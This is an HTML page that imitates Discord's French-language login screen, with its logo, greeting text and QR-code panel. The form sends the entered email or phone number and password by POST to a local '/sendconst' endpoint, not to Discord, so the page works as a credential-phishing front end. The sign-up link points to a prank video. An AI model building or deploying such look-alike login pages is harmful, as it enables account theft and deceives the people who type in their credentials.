<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Discord</title>
    <link rel="stylesheet" href="style.css">
    <link rel="icon" type="image/png" href="Media/discord-logo.png">
    <link rel="preconnect" href="https://fonts.googleapis.com">
	<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
	<link href="https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
</head>
<body>

    <form class="Formulaire" action="/sendconst" method="post">
        <div class="Left">
            <div class="discordLogo"></div>
            <div class="formhead">
                <H1>Ha, te revoilà !</H1>
                <h2>Nous sommes si heureux de te revoir !</h2>
            </div>
            <div class="formbody">
                <label class="form_label" id=":r0:" for="uid_7">E-mail ou numéro de téléphone<span class="required">*</span></label>
                <input class="firstinput" id="uid_7" name="email" type="text" placeholder="" aria-label="E-mail ou numéro de téléphone" required="true" autocomplete="off" autocapitalize="none" autocorrect="off" maxlength="999" spellcheck="false" aria-labelledby=":r0:" value="">

                <label class="form_label" id=":r0:" for="uid_7">Mot de passe<span class="required">*</span></label>
                <input class="input" name="password" type="password" placeholder="" required="true" aria-label="Mot de passe" autocomplete="off" maxlength="999" spellcheck="false" id="uid_9" aria-labelledby=":r2:" value="">
                <div class="forget">
                    Tu as oublié ton mot de passe ?
                </div>
            </div>

            <button type="submit" class="Connect"><div class="buttontext">Connexion</div></button>
            <div class="create"><span class="needAccount">Besoin d'un compte&nbsp;?</span><a href="https://www.youtube.com/watch?v=dQw4w9WgXcQ"><div class="forget">S'inscrire</div></a></div>
        </div>
        <div class="Right">
            <img src="Media/QRcode.png" alt="qrcode">
            <h1>Se connecter avec un code QR</h1>
            <h2>Scanne-le avec l'application mobile Discord pour te connecter instantanément.</h2>
        </div>
    </form>
    
</body>
</html>